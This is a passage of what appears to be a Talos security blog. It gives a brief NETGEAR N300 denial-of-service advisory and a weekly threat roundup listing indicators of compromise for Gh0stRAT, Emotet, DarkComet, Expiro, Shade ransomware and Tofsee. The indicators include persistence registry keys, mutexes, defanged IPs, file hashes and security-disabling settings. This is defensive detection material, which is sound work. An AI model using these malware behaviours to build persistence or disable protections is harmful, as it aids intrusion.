Snort SIDs: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 - 51483

Title: Some NETGEAR routers vulnerable to DoS attacks
                Description: The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely. 
                Snort SIDs: 50040 (Written by Dave McDaniel)

                Most prevalent malware files this week

                SHA 256: 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13 
                MD5: c24315b0585b852110977dacafe6c8c1
                Typical Filename: puls.exe
                Claimed Product: N/A
                Detection Name: W32.DoublePulsar:WNCryLdrA.22is.1201 

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A 
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
                MD5: 47b97de62ae8b2b927542aa5d7f3c858 
                Typical Filename: qmreportupload
                Claimed Product: qmreportupload.exe
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
                Typical Filename: sayext.gif
                Claimed Product: N/A
                Detection Name: W32.093CC39350-100.SBX.TG 

                Threat Roundup for September 6 to September 13

                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
                The most prevalent threats highlighted in this roundup are:
Threat Name | Type | Description
Win.Dropper.Gh0stRAT-7155936-0 | Dropper | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Doc.Downloader.Emotet-7155084-0 | Downloader | Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links.
Win.Dropper.DarkComet-7154925-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Virus.Expiro-7153559-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Ransomware.Shade-7158472-0 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.
Win.Packed.Tofsee-7150793-1 | Packed | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

                Threat Breakdown

                Win.Dropper.Gh0stRAT-7155936-0

                Indicators of Compromise

Registry Keys / Occurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
                Value Name: Version
                24
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
                Value Name: Group
                24
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Lostlove_K
                6
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB 1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ImagePath
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS 1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: ImagePath
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: DisplayName
                1
Mutexes
IP Addresses contacted by malware (does not indicate maliciousness)
Domain Names contacted by malware (does not indicate maliciousness)
Files and/or directories created

                File Hashes

                *See JSON for more IOCs

                Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Doc.Downloader.Emotet-7155084-0

                Indicators of Compromise

Registry Keys / Occurrences
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                Value Name: Blob
                14
IP Addresses contacted by malware (does not indicate maliciousness)
Domain Names contacted by malware (does not indicate maliciousness)
Files and/or directories created

                File Hashes


                Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Dropper.DarkComet-7154925-1

                Indicators of Compromise

Registry Keys / Occurrences
                <HKCU>\SOFTWARE\DC3_FEXEC 5
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: UserInit
                4
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: EnableFirewall
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DisableNotifications
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: EnableLUA
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: MicroUpdate
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Policies
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Policies
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: DisableTaskMgr
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: AntiVirusDisableNotify
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
                Value Name: Start
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: DisableRegistryTools
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: System
                1
                <HKCU>\SOFTWARE\TGB61 1
                <HKCU>\SOFTWARE\TGB61
                Value Name: FirstExecution
                1
                <HKCU>\SOFTWARE\TGB61
                Value Name: NewIdentification
                1
Mutexes
IP Addresses contacted by malware (does not indicate maliciousness)
Domain Names contacted by malware (does not indicate maliciousness)
Files and/or directories created
                *See JSON for more IOCs

                File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid



Win.Virus.Expiro-7153559-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) | 18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER (Value Name: HideSCAHealth) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS (Value Name: Type) | 18
Mutexes | Occurrences
gazavat-svc | 18
kkq-vx_mtx52 | 18
kkq-vx_mtx53 | 18
kkq-vx_mtx54 | 18
kkq-vx_mtx55 | 18
kkq-vx_mtx56 | 18
kkq-vx_mtx57 | 18
kkq-vx_mtx58 | 18
kkq-vx_mtx59 | 18
kkq-vx_mtx60 | 18
kkq-vx_mtx61 | 18
kkq-vx_mtx62 | 18
kkq-vx_mtx63 | 18
kkq-vx_mtx64 | 18
kkq-vx_mtx65 | 18
kkq-vx_mtx66 | 18
kkq-vx_mtx67 | 18
kkq-vx_mtx68 | 18
kkq-vx_mtx69 | 18
kkq-vx_mtx70 | 18
kkq-vx_mtx71 | 18
kkq-vx_mtx72 | 18
kkq-vx_mtx73 | 18
kkq-vx_mtx74 | 18
kkq-vx_mtx75 | 18
*See JSON for more IOCs
Files and/or directories created | Occurrences
\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\ckjgpiji.tmp | 18
\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\klncjook.tmp | 18
\MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\bglnccaf.tmp | 18
\MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\mnclgkoo.tmp | 18
%CommonProgramFiles%\Microsoft Shared\MSInfo\kcndgmlj.tmp | 18
%CommonProgramFiles%\Microsoft Shared\OFFICE14\cgcganec.tmp | 18
%CommonProgramFiles%\Microsoft Shared\VSTO\10.0\pnpndocj.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\bafefhom.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\dnmejccm.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\ejlkpjei.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\fijffced.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\ghpbhbif.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\gkbpadmi.tmp | 18
%CommonProgramFiles%\Microsoft Shared\ink\pnhochhl.tmp | 18
%ProgramFiles%\DVD Maker\jaemdheq.tmp | 18
%ProgramFiles%\Internet Explorer\geakanpm.tmp | 18
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | 18
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe | 18
%System32%\alg.exe | 18
%System32%\dllhost.exe | 18
%System32%\ieetwcollector.exe | 18
%System32%\msdtc.exe | 18
%System32%\msiexec.exe | 18
%System32%\snmptrap.exe | 18
%System32%\sppsvc.exe | 18
*See JSON for more IOCs

File Hashes

042fc31aadb0e0a33f91c9513ed9110d0c181de5b49f22614eb15ca759aabc58
07964288aebc5a85af04a534b2e795ded8c270466edfe2938cb5a7aae95fedee
2868317804d6a32158c492563f8cf121b0e714d116046f66323d49f7ea441f96
32084017ad00fe6e0ab45a804904363e3526f383cc78d35df55f66937b96f8fd
45414708db6a99c7fb927fcbc84861e55255a85e1583eaf661ef6226a880c525
53fd6b9b925d4cf2b143f057f11fa15659dd8d3e560aafa54148e87082e0aae7
69907401f98b32f51c11cd53b5149b29f8c4ecab38e08ca76188739f57e00431
6e3f1120e34aac4dea7bc87ce7a7185074841bc7077c2fa13a742f0ca53c81a3
6fa4177a1ee93669aa408db21de55d860d9792f6d544cf3510d4c121c95f5be0
749762f179e4c19d613a128150d3b82d1b0c138424ad3d436a77874a3392829e
79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006
91a4c230b121564208cbb629ddb79df79651738b2abd59c426b32e4dc4022f1d
a24c20594273edfc118ccce5b7e82081240e9f6a3323818f7ac17d990170471d
a52fdbfecc6455806e30f138c43f02186f91daf5fb032e62efd68e697322542f
b2aac39e286f2172baa62b16555191a60d6c1d25d63f73de51d80d60f263db32
c367dd19b06798008ed520730d0c7e05f28645d4565de62969a318275b9e6cff
de601aa4336e1ae644b7dcee10e0748cea30d70907b7e899ae39b364b56e181f
e62cf47c56c9858faf8a344e9b468293b48069c0f1d47034fea06409e9c26644

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid



Win.Ransomware.Shade-7158472-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xi) | 71
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Client Server Runtime Subsystem) | 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xVersion) | 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32 | 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION | 71
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: shst) | 50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: sh1) | 50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xstate) | 50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xcnt) | 50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xmode) | 50
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: xpk) | 50
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG (Value Name: ExceptionRecord) | 41
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER (Value Name: CleanShutdown) | 32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963} (Value Name: Generation) | 32
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&A27250A&0&2 (Value Name: CustomPropertyHwIdKey) | 32
<HKLM>\SYSTEM\CONTROLSET001\ENUM\USB\VID_46F4&PID_0001\1-0000:00:1D.7-2 (Value Name: CustomPropertyHwIdKey) | 32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963} (Value Name: Data) | 32
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} (Value Name: Data) | 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} (Value Name: Generation) | 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} (Value Name: Data) | 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} (Value Name: Generation) | 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} (Value Name: Data) | 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} (Value Name: Generation) | 31
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1AF4&DEV_1001&SUBSYS_00021AF4&REV_00\3&2411E6FE&2&18 (Value Name: CustomPropertyHwIdKey) | 31
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION (Value Name: shsnt) | 31
Mutexes | Occurrences
cversions.2.m | 30
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
128[.]31[.]0[.]39 | 28
193[.]23[.]244[.]244 | 26
86[.]59[.]21[.]38 | 25
131[.]188[.]40[.]189 | 24
194[.]109[.]206[.]212 | 23
154[.]35[.]32[.]5 | 22
171[.]25[.]193[.]9 | 22
76[.]73[.]17[.]194 | 20
104[.]18[.]35[.]131 | 20
208[.]83[.]223[.]34 | 18
104[.]16[.]154[.]36 | 16
104[.]16[.]155[.]36 | 15
104[.]18[.]34[.]131 | 11
51[.]68[.]204[.]139 | 3
46[.]166[.]182[.]20 | 3
148[.]251[.]51[.]66 | 3
51[.]68[.]206[.]28 | 3
145[.]239[.]66[.]236 | 2
78[.]129[.]150[.]72 | 2
144[.]76[.]57[.]165 | 2
137[.]74[.]19[.]202 | 2
37[.]157[.]254[.]113 | 2
136[.]243[.]176[.]148 | 2
69[.]30[.]219[.]82 | 2
62[.]210[.]157[.]133 | 2
*See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
whatismyipaddress[.]com | 31
opengraphprotocol[.]org | 31
wsrs[.]net | 31
whatsmyip[.]net | 31
cmsgear[.]com | 31
luminati[.]io | 31
redirme[.]com | 31
Files and/or directories created | Occurrences
%ProgramData%\Windows\csrss.exe | 71
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859862[[fn=Urban Pop]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859865[[fn=Kilter]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859866[[fn=Macro]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859868[[fn=Thermal]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01972873[[fn=Summer]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455519[[fn=Winter]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455596[[fn=Spring]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455610[[fn=Autumn]].thmx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793058[[fn=Median]].dotx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793064[[fn=Equity]].dotx | 50
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx | 50
%APPDATA%\Microsoft\Templates\Normal.dotm | 50
%APPDATA%\Microsoft\UProof\CUSTOM.DIC | 50
%APPDATA%\Mozilla\Firefox\profiles.ini | 50
\README1.txt | 50
\README10.txt | 50
\README2.txt | 50
\README3.txt | 50
\README4.txt | 50
\README5.txt | 50
\README6.txt | 50
\README7.txt | 50
\README8.txt | 50
*See JSON for more IOCs

File Hashes

00591b03aa2be7dc7e67fa04a5da57bb803a2b4bc008fd7df40feadb72d2f00d
00953fe490792ae76ab5a584513a0ab3c460bcaa4fbb08f88ea5f0a261c44eab
018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6
01b2c4dd09be08a0db5cd266c2b0f4ae01ab920c6647910de820eb9cf82d55d4
01dea6848c96188f53d6e90977326b3562a2fcc30bd84c3d0e67880d6d4b8c50
02146af20bcaec9dbf6f30071791e73c7fd4eac6657f3b9d3159a6f663764250
025207f8e1551eb8156dd759426d57b2cbb42ce7b65479f071b7ffe8d0d03479
02b34490a5a4688b754dbb9be6507330ae88dfbc911f5c09e9e9e7c7ef10f2c5
02bf9968e18495581c271d4110a7bbaaf3889043c93af10357cb10499c8950a7
0616e6bc594dea95fad720bc966573921d9f2ec92eddcf665975227776e07fd6
0644b301b6414d2fe97644ae926849252c7a33607f2288253e9e53c5afd5c476
067cc19af3565e37da3bc0189210ad87ad111faf2a4c845f01fca036e3da912b
068491e6b7b02d7fef9a4778862886565795765b28b3c8f72f0d7adebc0b0a47
06a02b8b9e4871d0e558818a259dc6b6fcd0789b3d6a0f1c35dfaf90a8fc33f6
072a786d43860a9b5c2d4b49c1228ba651fad80e812eccd3e698d0f7b1b3adae
0769d0046146bd19aa118706ac9a470575139f06479c2781b680b5d8b92cce05
093bc279dcf1d7ee9a194af8e1e323b9ebe94f8a59a6dbbed8e82ca552c4dcb2
09483603bc66291e19444d644a5627416fb09d097b2a5efac0755c957cf7aedd
0c244b7cf8841885f0fecb184610c80ff3b3f6015e86f50ce35023383396dbf2
0c703b45991e6b99d4d4155af6437c5e255d7e52af06a2c9a29a3391774e4ae7
0d35cc4470e1f4493c8a9919769a9069a7deae2ee6ced8bd8ef0040c934a57f9
0d7531dc6587e8d9f9e3eae58e803b4aafd6d35927e7d48cc0a730cdc98a89d0
0df9f6f2d26051ba29c79a61f46e482d0cd61bb20a699cc7937e2f52f4d20fca
0e1f57431d814b1383b0202f10cdc0e929bd17d7788dc04e5d99b5f60761484e
0e21c68614126c9afae8a7747af154fdd254def83795bdb4033cb5a50de80026
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid



Win.Packed.Tofsee-7150793-1

Indicators of Compromise

Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config3) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) | 18
